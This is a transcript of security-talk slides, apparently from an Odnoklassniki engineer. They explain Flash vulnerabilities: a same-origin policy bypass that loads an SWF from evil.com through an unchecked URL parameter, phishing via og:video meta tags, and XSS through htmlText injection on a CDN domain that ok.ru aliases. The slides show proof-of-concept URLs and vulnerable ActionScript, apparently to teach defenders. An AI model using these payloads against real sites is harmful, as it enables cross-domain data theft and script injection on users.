Flash умер. Да здравствует Flash! Александра Сватикова Одноклассники
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Flash умер. Да здравствует Flash!
Александра Сватикова Одноклассники
Модель безопасности Flash
• Application sandbox
• Security domain / application domain
#1 Same-Origin Policy bypass
http://st.mycdn.me/vulnerable.swf?conf=config.swf
Jakub Żoczek (@zoczus)
loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);
#1 Same-Origin Policy bypass
http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swf
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf
loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);
#1 Same-Origin Policy bypass
evil.com mycdn.me
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf
loader.load(new URLRequest(loaderInfo.parameters.conf), new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain)); !addChild(loader);
#1 Same-Origin Policy bypassJakub Żoczek (@zoczus)
http://ok.ru/crossdomain.xml
<cross-domain-policy> ... <allow-access-from domain="st.mycdn.me"/> <allow-access-from domain="ok.ru"/> <allow-access-from domain="*.ok.ru"/> ... </cross-domain-policy>
#1 Same-Origin Policy bypassJakub Żoczek (@zoczus)
http://ok.ru/crossdomain.xml
evil.com ok.ru
<cross-domain-policy> ... <allow-access-from domain="st.mycdn.me"/> <allow-access-from domain="ok.ru"/> <allow-access-from domain="*.ok.ru"/> ... </cross-domain-policy>
#2 Phishing… <meta property=“og:video" content=“http://tv.ru/player.swf?conf=http://tv.ru/config.swf” > …
#2 Phishing<meta property=“og:video" content=“http://tv.ru/player.swf?conf=http://tv.ru/config.swf” >
<meta property=“og:video" content=“http://tv.ru/player.swf? conf=http://tv.ru.evil.com/config.swf” >
#2 Phishing<meta property=“og:video" content=“http://tv.ru/player.swf? conf=http://tv.ru.evil.com/config.swf” >
#3 XSS in CDN domainhttp://st.mycdn.me/vulnerable.swf?param=username
_root.createTextField("Inputbox",0,20,20,320,240); _root.Inputbox.html=true; _root.Inputbox.htmlText=“Welcome " + _root.param;
http://st.mycdn.me/vulnerable.swf?param=<script>alert(‘xss’)</script>
#3 XSS in CDN domain
$ host st.mycdn.me st.mycdn.me has address 217.20.152.226 $ $ host videoplayer.ok.ru videoplayer.ok.ru is an alias for st.mycdn.me. videoplayer.ok.ru has address 217.20.152.226
#3 XSS in CDN domain
$ host st.mycdn.me st.mycdn.me has address 217.20.152.226 $ $ host videoplayer.ok.ru videoplayer.ok.ru is an alias for st.mycdn.me. videoplayer.ok.ru has address 217.20.152.226
http://videoplayer.ok.ru/vulnerable.swf?param=alert(‘xss’)
Спасибо за внимание!
Related Documents
